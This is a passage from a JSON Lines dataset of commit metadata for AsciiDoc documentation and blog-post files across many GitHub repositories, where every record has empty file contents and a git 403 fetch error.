...\"","repos":"wuranbo\/elasticsearch,mortonsykes\/elasticsearch,njlawton\/elasticsearch,mohit\/elasticsearch,gmarz\/elasticsearch,GlenRSmith\/elasticsearch,IanvsPoplicola\/elasticsearch,bawse\/elasticsearch,wenpos\/elasticsearch,mikemccand\/elasticsearch,fred84\/elasticsearch,obourgain\/elasticsearch,jimczi\/elasticsearch,obourgain\/elasticsearch,StefanGor\/elasticsearch,liweinan0423\/elasticsearch,rlugojr\/elasticsearch,elasticdog\/elasticsearch,gfyoung\/elasticsearch,masaruh\/elasticsearch,s1monw\/elasticsearch,scottsom\/elasticsearch,MisterAndersen\/elasticsearch,MaineC\/elasticsearch,coding0011\/elasticsearch,henakamaMSFT\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,yanjunh\/elasticsearch,nilabhsagar\/elasticsearch,fforbeck\/elasticsearch,mohit\/elasticsearch,spiegela\/elasticsearch,scottsom\/elasticsearch,mohit\/elasticsearch,spiegela\/elasticsearch,a2lin\/elasticsearch,mikemccand\/elasticsearch,JervyShi\/elasticsearch,Shepard1212\/elasticsearch,sneivandt\/elasticsearch,shreejay\/elasticsearch,gingerwizard\/elasticsearch,elasticdog\/elasticsearch,geidies\/elasticsearch,LewayneNaidoo\/elasticsearch,IanvsPoplicola\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,rajanm\/elasticsearch,brandonkearby\/elasticsearch,LewayneNaidoo\/elasticsearch,brandonkearby\/elasticsearch,umeshdangat\/elasticsearch,mortonsykes\/elasticsearch,uschindler\/elasticsearch,ZTE-PaaS\/elasticsearch,markwalkom\/elasticsearch,MisterAndersen\/elasticsearch,vroyer\/elassandra,HonzaKral\/elasticsearch,umeshdangat\/elasticsearch,a2lin\/elasticsearch,liweinan0423\/elasticsearch,nilabhsagar\/elasticsearch,nazarewk\/elasticsearch,henakamaMSFT\/elasticsearch,mjason3\/elasticsearch,ZTE-PaaS\/elasticsearch,GlenRSmith\/elasticsearch,jimczi\/elasticsearch,rlugojr\/elasticsearch,henakamaMSFT\/elasticsearch,obourgain\/elasticsearch,GlenRSmith\/elasticsearch,artnowo\/elasticsearch,nazarewk\/elasticsearch,mortonsykes\/elasticsearch,jprante\/elasticsearch,yanjunh\/elasticsearch,geidies\/elasticsearch,liweinan0423\/elasticsearch,nezirus\/elasticsearch,brandonkearby\/elasticsearch,markwalkom\/elasticsearch,winstonewert\/elasticsearch,C-Bish\/elasticsearch,scorpionvicky\/elasticsearch,i-am-Nathan\/elasticsearch,IanvsPoplicola\/elasticsearch,qwerty4030\/elasticsearch,mjason3\/elasticsearch,rajanm\/elasticsearch,Stacey-Gammon\/elasticsearch,mortonsykes\/elasticsearch,glefloch\/elasticsearch,lks21c\/elasticsearch,rlugojr\/elasticsearch,jimczi\/elasticsearch,gingerwizard\/elasticsearch,wangtuo\/elasticsearch,JSCooke\/elasticsearch,naveenhooda2000\/elasticsearch,gingerwizard\/elasticsearch,LewayneNaidoo\/elasticsearch,geidies\/elasticsearch,LewayneNaidoo\/elasticsearch,maddin2016\/elasticsearch,pozhidaevak\/elasticsearch,mohit\/elasticsearch,alexshadow007\/elasticsearch,rajanm\/elasticsearch,scottsom\/elasticsearch,Shepard1212\/elasticsearch,rajanm\/elasticsearch,LewayneNaidoo\/elasticsearch,sneivandt\/elasticsearch,JackyMai\/elasticsearch,Stacey-Gammon\/elasticsearch,maddin2016\/elasticsearch,bawse\/elasticsearch,s1monw\/elasticsearch,uschindler\/elasticsearch,mjason3\/elasticsearch,jprante\/elasticsearch,StefanGor\/elasticsearch,geidies\/elasticsearch,alexshadow007\/elasticsearch,maddin2016\/elasticsearch,masaruh\/elasticsearch,artnowo\/elasticsearch,naveenhooda2000\/elasticsearch,uschindler\/elasticsearch,elasticdog\/elasticsearch,spiegela\/elasticsearch,winstonewert\/elasticsearch,HonzaKral\/elasticsearch,fred84\/elasticsearch,bawse\/elasticsearch,nezirus\/elasticsearch,nknize\/elasticsearch,winsto
newert\/elasticsearch,nilabhsagar\/elasticsearch,LeoYao\/elasticsearch,glefloch\/elasticsearch,naveenhooda2000\/elasticsearch,gfyoung\/elasticsearch,MisterAndersen\/elasticsearch,mjason3\/elasticsearch,i-am-Nathan\/elasticsearch,nezirus\/elasticsearch,Helen-Zhao\/elasticsearch,LeoYao\/elasticsearch,Stacey-Gammon\/elasticsearch,jprante\/elasticsearch,winstonewert\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,i-am-Nathan\/elasticsearch,glefloch\/elasticsearch,jimczi\/elasticsearch,JackyMai\/elasticsearch,scorpionvicky\/elasticsearch,i-am-Nathan\/elasticsearch,gmarz\/elasticsearch,markwalkom\/elasticsearch,lks21c\/elasticsearch,rajanm\/elasticsearch,rlugojr\/elasticsearch,lks21c\/elasticsearch,i-am-Nathan\/elasticsearch,strapdata\/elassandra,kalimatas\/elasticsearch,MaineC\/elasticsearch,JervyShi\/elasticsearch,fforbeck\/elasticsearch,coding0011\/elasticsearch,mikemccand\/elasticsearch,wenpos\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,yanjunh\/elasticsearch,gingerwizard\/elasticsearch,MisterAndersen\/elasticsearch,JSCooke\/elasticsearch,qwerty4030\/elasticsearch,JervyShi\/elasticsearch,LeoYao\/elasticsearch,C-Bish\/elasticsearch,henakamaMSFT\/elasticsearch,bawse\/elasticsearch,wangtuo\/elasticsearch,Helen-Zhao\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,pozhidaevak\/elasticsearch,njlawton\/elasticsearch,mortonsykes\/elasticsearch,geidies\/elasticsearch,obourgain\/elasticsearch,qwerty4030\/elasticsearch,JackyMai\/elasticsearch,njlawton\/elasticsearch,obourgain\/elasticsearch,s1monw\/elasticsearch,naveenhooda2000\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,StefanGor\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,spiegela\/elasticsearch,umeshdangat\/elasticsearch,MaineC\/elasticsearch,kalimatas\/elasticsearch,mikemccand\/elasticsearch,vroyer\/elasticassandra,shreejay\/elasticsearch,nilabhsagar\/elasticsearch,brandonkearby\/elasticsearch,robin13\/elasticsearch,shreejay\/elasticsearch,StefanGor\/elasticsearch,glefloch\/elasticsearch,mjason3\/elasticsearch,wuranbo\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,LeoYao\/elasticsearch,ZTE-PaaS\/elasticsearch,wenpos\/elasticsearch,gmarz\/elasticsearch,vroyer\/elassandra,nazarewk\/elasticsearch,fforbeck\/elasticsearch,kalimatas\/elasticsearch,a2lin\/elasticsearch,C-Bish\/elasticsearch,JSCooke\/elasticsearch,nazarewk\/elasticsearch,jprante\/elasticsearch,masaruh\/elasticsearch,wangtuo\/elasticsearch,MaineC\/elasticsearch,fforbeck\/elasticsearch,markwalkom\/elasticsearch,LeoYao\/elasticsearch,C-Bish\/elasticsearch,jprante\/elasticsearch,maddin2016\/elasticsearch,gmarz\/elasticsearch,shreejay\/elasticsearch,wangtuo\/elasticsearch,liweinan0423\/elasticsearch,JackyMai\/elasticsearch,nknize\/elasticsearch,umeshdangat\/elasticsearch,fernandozhu\/elasticsearch,masaruh\/elasticsearch,markwalkom\/elasticsearch,jimczi\/elasticsearch,naveenhooda2000\/elasticsearch,robin13\/elasticsearch,strapdata\/elassandra,umeshdangat\/elasticsearch,alexshadow007\/elasticsearch,yanjunh\/elasticsearch,Shepard1212\/elasticsearch,scorpionvicky\/elasticsearch,Helen-Zhao\/elasticsearch,strapdata\/elassandra,artnowo\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,vroyer\/elasticassandra,uschindler\/elasticsearch,vroyer\/elassandra,a2lin\/elasticsearch,rajanm\/elasticsearch,rlugojr\/elasticsearch,nilabhsagar\/elasticsearch,elasticdog\/elasticsearch,gfyoung\/elasticsearch,fernandozhu\/elasticsearch,JervyShi\/elasticsearch,wuranbo\/elasticsearch,ZTE-PaaS\/elasticsearch,henakamaMSFT\/elasticsearch,fred84\/elasticsearch,GlenRSmit
h\/elasticsearch,masaruh\/elasticsearch,shreejay\/elasticsearch,JSCooke\/elasticsearch,nazarewk\/elasticsearch,yanjunh\/elasticsearch,scottsom\/elasticsearch,lks21c\/elasticsearch,vroyer\/elasticassandra,Shepard1212\/elasticsearch,wuranbo\/elasticsearch,C-Bish\/elasticsearch,kalimatas\/elasticsearch,IanvsPoplicola\/elasticsearch,fred84\/elasticsearch,wangtuo\/elasticsearch,sneivandt\/elasticsearch,spiegela\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,StefanGor\/elasticsearch,Stacey-Gammon\/elasticsearch,brandonkearby\/elasticsearch,bawse\/elasticsearch,alexshadow007\/elasticsearch,sneivandt\/elasticsearch,wuranbo\/elasticsearch,nezirus\/elasticsearch,glefloch\/elasticsearch,fernandozhu\/elasticsearch,JervyShi\/elasticsearch,elasticdog\/elasticsearch,qwerty4030\/elasticsearch,winstonewert\/elasticsearch,qwerty4030\/elasticsearch,artnowo\/elasticsearch,GlenRSmith\/elasticsearch,LeoYao\/elasticsearch,Helen-Zhao\/elasticsearch,pozhidaevak\/elasticsearch,ZTE-PaaS\/elasticsearch,wenpos\/elasticsearch,JackyMai\/elasticsearch,MisterAndersen\/elasticsearch,LeoYao\/elasticsearch,robin13\/elasticsearch,Shepard1212\/elasticsearch,coding0011\/elasticsearch,njlawton\/elasticsearch,geidies\/elasticsearch,liweinan0423\/elasticsearch,strapdata\/elassandra,pozhidaevak\/elasticsearch,mohit\/elasticsearch,Helen-Zhao\/elasticsearch,pozhidaevak\/elasticsearch,Stacey-Gammon\/elasticsearch,fernandozhu\/elasticsearch,IanvsPoplicola\/elasticsearch,alexshadow007\/elasticsearch,fforbeck\/elasticsearch,njlawton\/elasticsearch,maddin2016\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,JervyShi\/elasticsearch,gmarz\/elasticsearch,lks21c\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,mikemccand\/elasticsearch,nezirus\/elasticsearch,fernandozhu\/elasticsearch,HonzaKral\/elasticsearch,artnowo\/elasticsearch,a2lin\/elasticsearch,markwalkom\/elasticsearch,sneivandt\/elasticsearch,coding0011\/elasticsearch,scottsom\/elasticsearch,strapdata\/elassandra,fred84\/elasticsearch,MaineC\/elasticsearch,robin13\/elasticsearch,kalimatas\/elasticsearch,JSCooke\/elasticsearch,s1monw\/elasticsearch,wenpos\/elasticsearch,ThiagoGarciaAlves\/elasticsearch","old_file":"docs\/reference\/getting-started.asciidoc","new_file":"docs\/reference\/getting-started.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f660ad13adea75cd77fe6e59e6733acf913920b5","subject":"Update 2017-01-03-The-Naming-Problem.adoc","message":"Update 2017-01-03-The-Naming-Problem.adoc","repos":"ncomet\/asciiblog,ncomet\/asciiblog,ncomet\/asciiblog,ncomet\/asciiblog","old_file":"_posts\/2017-01-03-The-Naming-Problem.adoc","new_file":"_posts\/2017-01-03-The-Naming-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ncomet\/asciiblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9dd49c797745bd325cb62de34813b85b992147b8","subject":"Update 2018-11-27-Log-enter-and-exit.adoc","message":"Update 
2018-11-27-Log-enter-and-exit.adoc","repos":"sfoubert\/sfoubert.github.io,sfoubert\/sfoubert.github.io,sfoubert\/sfoubert.github.io,sfoubert\/sfoubert.github.io","old_file":"_posts\/2018-11-27-Log-enter-and-exit.adoc","new_file":"_posts\/2018-11-27-Log-enter-and-exit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sfoubert\/sfoubert.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4a35773493f85a7e3e239ea2f07e291ef285aeb","subject":"Update 2016-08-04-Very-first-Post-of-my-own-Blog.adoc","message":"Update 2016-08-04-Very-first-Post-of-my-own-Blog.adoc","repos":"amuhle\/amuhle.github.io,amuhle\/amuhle.github.io,amuhle\/amuhle.github.io,amuhle\/amuhle.github.io","old_file":"_posts\/2016-08-04-Very-first-Post-of-my-own-Blog.adoc","new_file":"_posts\/2016-08-04-Very-first-Post-of-my-own-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/amuhle\/amuhle.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b1141da918660758786fcccbcd93eae8f32e71a","subject":":memo: Selenide code tips","message":":memo: Selenide code tips\n","repos":"syon\/refills","old_file":"src\/refills\/selenium\/selenide-tips.adoc","new_file":"src\/refills\/selenium\/selenide-tips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/syon\/refills.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9327153a61a6dd97bc0c2c58d54f2164782231d","subject":"doc: userguide: add extend\/trunc doc","message":"doc: userguide: add extend\/trunc doc\n\nAdd additional information about the new APIs:\nodp_packet_extend_head() \/ odp_packet_trunc_head()\nodp_packet_extend_tail() \/ odp_packet_trunc_tail()\n\nSigned-off-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nReviewed-by: Mike Holmes <ed44c09f4d7f698f5510adc894a872c73e08c8bd@linaro.org>\nSigned-off-by: Mike Holmes <ed44c09f4d7f698f5510adc894a872c73e08c8bd@linaro.org>\n","repos":"ravineet-singh\/odp,nmorey\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,ravineet-singh\/odp,erachmi\/odp,dkrot\/odp,dkrot\/odp,mike-holmes-linaro\/odp,nmorey\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,erachmi\/odp,nmorey\/odp,dkrot\/odp,dkrot\/odp,nmorey\/odp,erachmi\/odp,mike-holmes-linaro\/odp,erachmi\/odp","old_file":"doc\/users-guide\/users-guide-packet.adoc","new_file":"doc\/users-guide\/users-guide-packet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"2c5f912c3d2321b899c5a55a88d0903abde3010f","subject":"Added the sagan adoc files","message":"Added the sagan adoc files\n\nResolves #1700\n","repos":"ilayaperumalg\/spring-cloud-stream,ilayaperumalg\/spring-cloud-stream,garyrussell\/spring-cloud-stream,garyrussell\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,garyrussell\/spring-cloud-stream","old_file":"docs\/src\/main\/asciidoc\/sagan-index.adoc","new_file":"docs\/src\/main\/asciidoc\/sagan-index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ilayaperumalg\/spring-cloud-stream.git\/': The requested URL 
returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"53e87f85c5b549607625f2d9190e1d2bd35b812f","subject":"Update 2016-02-19-Java-Flags.adoc","message":"Update 2016-02-19-Java-Flags.adoc","repos":"azubkov\/azubkov.github.io,azubkov\/azubkov.github.io,azubkov\/azubkov.github.io","old_file":"_posts\/2016-02-19-Java-Flags.adoc","new_file":"_posts\/2016-02-19-Java-Flags.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/azubkov\/azubkov.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8eb9274d68583a81e8b6af0645c5c3962f43ba4c","subject":"[narada-base] Merge branch 'master' into socklog","message":"[narada-base] Merge branch 'master' into socklog\n","repos":"qarea\/planningms,qarea\/jirams,qarea\/planningms,qarea\/jirams","old_file":"doc\/narada-base.adoc","new_file":"doc\/narada-base.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/qarea\/jirams.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e73ced207a3be5017548a394d343d70a9ebc7278","subject":"Update 2016-10-18-Making-Businesses.adoc","message":"Update 2016-10-18-Making-Businesses.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2016-10-18-Making-Businesses.adoc","new_file":"_posts\/2016-10-18-Making-Businesses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa629864167f21dafc96dd8013c8fc95c6a0c835","subject":"Update 2015-09-20-Python-re-module.adoc","message":"Update 2015-09-20-Python-re-module.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-20-Python-re-module.adoc","new_file":"_posts\/2015-09-20-Python-re-module.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d19c3ad2b0c90a7fd07b0f992c4efebc87ab7452","subject":"Update 2019-01-31-It-is-but-a-Test.adoc","message":"Update 2019-01-31-It-is-but-a-Test.adoc","repos":"deivisk\/deivisk.github.io,deivisk\/deivisk.github.io,deivisk\/deivisk.github.io,deivisk\/deivisk.github.io","old_file":"_posts\/2019-01-31-It-is-but-a-Test.adoc","new_file":"_posts\/2019-01-31-It-is-but-a-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/deivisk\/deivisk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"364c94ac5df16bfae4ad67d061ce82c0a2335bcc","subject":"Update 2020-01-17-wonder.adoc","message":"Update 2020-01-17-wonder.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2020-01-17-wonder.adoc","new_file":"_posts\/2020-01-17-wonder.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d8793a0fd57896e767959b009c2469125cf3e10","subject":"Update 2016-04-14-Inyeccion-L-D-A-P.adoc","message":"Update 2016-04-14-Inyeccion-L-D-A-P.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-14-Inyeccion-L-D-A-P.adoc","new_file":"_posts\/2016-04-14-Inyeccion-L-D-A-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36032eda22f81364318f75da29205e3248cd1a67","subject":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","message":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a14b59b986fb8f7d077b789b036ecf454414ed5e","subject":"Update 2016-08-13-Meu-primeiro-post.adoc","message":"Update 2016-08-13-Meu-primeiro-post.adoc","repos":"emtudo\/emtudo.github.io,emtudo\/emtudo.github.io,emtudo\/emtudo.github.io,emtudo\/emtudo.github.io","old_file":"_posts\/2016-08-13-Meu-primeiro-post.adoc","new_file":"_posts\/2016-08-13-Meu-primeiro-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/emtudo\/emtudo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"410836b4f91e1aef540ce35c80c9445a35e8fc96","subject":"update httpd post","message":"update httpd post\n","repos":"jbosschina\/openshift-cookbooks","old_file":"linux\/svc\/httpd.adoc","new_file":"linux\/svc\/httpd.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbosschina\/openshift-cookbooks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c7ca394cc83754bffbdfae3c91b882dea4c64377","subject":"Update 2016-07-03-Rights-and-Duties.adoc","message":"Update 2016-07-03-Rights-and-Duties.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-03-Rights-and-Duties.adoc","new_file":"_posts\/2016-07-03-Rights-and-Duties.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f388490df4fdd29906ea4e8ca790b4b47e0c9239","subject":"adding documentation for gt\/e-lt\/e filtering on multiple fields","message":"adding documentation for gt\/e-lt\/e filtering on multiple 
fields\n","repos":"djangonauts\/django-hstore,pombredanne\/django-hstore,pombredanne\/django-hstore,djangonauts\/django-hstore,pombredanne\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore,Stranger6667\/django-hstore,Stranger6667\/django-hstore,pombredanne\/django-hstore","old_file":"doc\/doc.asciidoc","new_file":"doc\/doc.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/djangonauts\/django-hstore.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68fd7ae0f072b1c53c949cc53c78b6ee1f3c0d56","subject":"Update 2015-03-30-Premiere-version-V0.adoc","message":"Update 2015-03-30-Premiere-version-V0.adoc","repos":"Fendi-project\/fendi-project.github.io,Fendi-project\/fendi-project.github.io,Fendi-project\/fendi-project.github.io","old_file":"_posts\/2015-03-30-Premiere-version-V0.adoc","new_file":"_posts\/2015-03-30-Premiere-version-V0.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Fendi-project\/fendi-project.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e8d52d23840112cd7143e46270c6a99172280068","subject":"add datadog guide","message":"add datadog guide","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/metrics-datadog.adoc","new_file":"userguide\/tutorials\/metrics-datadog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ccd9ae8327fd0cc86638554c4ce187d88e7f6c3d","subject":"Update 2015-09-17-drupal_add_js.adoc","message":"Update 2015-09-17-drupal_add_js.adoc","repos":"tom-konda\/blog,tom-konda\/blog,tom-konda\/blog,tom-konda\/blog","old_file":"_posts\/2015-09-17-drupal_add_js.adoc","new_file":"_posts\/2015-09-17-drupal_add_js.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tom-konda\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9580b0a2a2b85bc77d233c34c6e27d55208fa63f","subject":"Add the bonjour documentation","message":"Add the bonjour documentation\n","repos":"redhat-reactive-msa\/redhat-reactive-msa","old_file":"service-bonjour.adoc","new_file":"service-bonjour.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-reactive-msa\/redhat-reactive-msa.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ea77b6a01f8ba4ddc7e0d10ebd39243d2b618b8e","subject":"Further notes auto inst","message":"Further notes auto inst\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Automated Eclipse install.adoc","new_file":"Dev tools\/Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f78e1f0c774b54375c4799bf78606f912e169901","subject":"Renamed '_posts\/2019-01-31-Hello-Github-World.adoc' to '_posts\/2017-07-14-Hello-Github-World.adoc'","message":"Renamed 
'_posts\/2019-01-31-Hello-Github-World.adoc' to '_posts\/2017-07-14-Hello-Github-World.adoc'","repos":"mkhymohamed\/mkhymohamed.github.io,mkhymohamed\/mkhymohamed.github.io,mkhymohamed\/mkhymohamed.github.io,mkhymohamed\/mkhymohamed.github.io","old_file":"_posts\/2017-07-14-Hello-Github-World.adoc","new_file":"_posts\/2017-07-14-Hello-Github-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mkhymohamed\/mkhymohamed.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0934824d8bb7929672378a05fff1713098e86e61","subject":"Update 2011-07-23-1659-SSLTLS-un-probleme-frequent.adoc","message":"Update 2011-07-23-1659-SSLTLS-un-probleme-frequent.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2011-07-23-1659-SSLTLS-un-probleme-frequent.adoc","new_file":"_posts\/2011-07-23-1659-SSLTLS-un-probleme-frequent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9cacf79567ec29096a247fbeb8aac6dde58c468c","subject":"Update 2014-09-29-Learning-Programming-the-Backlog.adoc","message":"Update 2014-09-29-Learning-Programming-the-Backlog.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-09-29-Learning-Programming-the-Backlog.adoc","new_file":"_posts\/2014-09-29-Learning-Programming-the-Backlog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33d847c0b6fb5a64e0c5f913727bd7bbe4edb1d2","subject":"y2b create post Probably The Weirdest Gadget Yet...","message":"y2b create post Probably The Weirdest Gadget Yet...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-20-Probably-The-Weirdest-Gadget-Yet.adoc","new_file":"_posts\/2017-04-20-Probably-The-Weirdest-Gadget-Yet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ade5ec778ab4a5dd5aee1fd23dafe394f0c4d621","subject":"Update 2016-10-06-Un-premier-article.adoc","message":"Update 2016-10-06-Un-premier-article.adoc","repos":"sebprev\/blog,sebprev\/blog,sebprev\/blog,sebprev\/blog","old_file":"_posts\/2016-10-06-Un-premier-article.adoc","new_file":"_posts\/2016-10-06-Un-premier-article.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebprev\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a6f3d14f3b60667f1ebd95df71e89d562447edb6","subject":"Update 2017-11-22-Ideas-that-made-it.adoc","message":"Update 
2017-11-22-Ideas-that-made-it.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-11-22-Ideas-that-made-it.adoc","new_file":"_posts\/2017-11-22-Ideas-that-made-it.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1bfdb81feb88898e215fcd1772d9a550f9e7335","subject":"Update 2017-12-08-A-W-S-Cloud9golang.adoc","message":"Update 